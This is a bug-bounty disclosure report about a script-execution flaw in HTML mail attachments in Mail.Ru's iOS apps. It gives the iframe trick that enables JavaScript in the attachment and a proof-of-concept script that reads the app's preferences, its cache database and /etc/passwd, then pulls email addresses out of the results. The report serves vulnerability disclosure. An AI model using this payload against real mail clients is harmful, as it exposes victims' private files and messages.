Mail.ru: XSS bypass Script execute,Read any file,execute any javascript code--UXSS

2017-06-25T15:46:57
ID H1:243058
Type hackerone
Reporter tea
Modified 2018-01-27T15:01:31

Description

Mail attachment XSS bypass vulnerability--UXSS

Vulnerability impact: Mail.Ru Mail for iOS MyMail for iOS

explain: Mail app supports HTML attachments, however,Cannot execute javascript. for example <script>alert(/xss/)</script> <img src=# onerror=alert(/xss/)> These statements can not be executed in the html attachments...LOL

However, the addition of a statement can execute the scriptjavascript. I did not understand it now Is this sentence: <iframe SRC=#></iframe> has this, javascript can execute.... The other will not work,eg: <iframe src=1></iframe> or <iframe src=http://www.google.com></iframe>

the xss is file:// domain, so read any file. no same-origin policy,access to ant web origin and local files; testing: Write an email Add an HTML attachment send

HTML attachment content: <iframe SRC=# ></iframe> <script>alert(/xss/)</script>

HTML attachment can execute javascript.

read file poc:

function GetMailAddress(mailcontent){ var content_reg = new RegExp("\w+\@\w+\.\w+",'g'); alert(mailcontent.replace('/\s/g','').replace('/\S/g','').match(content_reg)); }

function read_file(read_file_path,tag){ var oReq = new XMLHttpRequest(); oReq.addEventListener("load", function(){ if (tag === true){ GetMailAddress(this.responseText); } else { alert(this.responseText); } } ); oReq.open("GET", read_file_path); oReq.send(); }

var Lib_file_path = location.href.split('Library')[0] + 'Library';
var mail_plist_file = Lib_file_path + '/Preferences/ru.mail.mail.plist';
var passwd_file = 'file:///etc/passwd';
var cache_passwd = Lib_file_path + '/Caches/ru.mail.mail/Cache.db';
read_file(mail_plist_file,true);
read_file(passwd_file,false);
read_file(cache_passwd,false);

For more information, please see the attachment of my report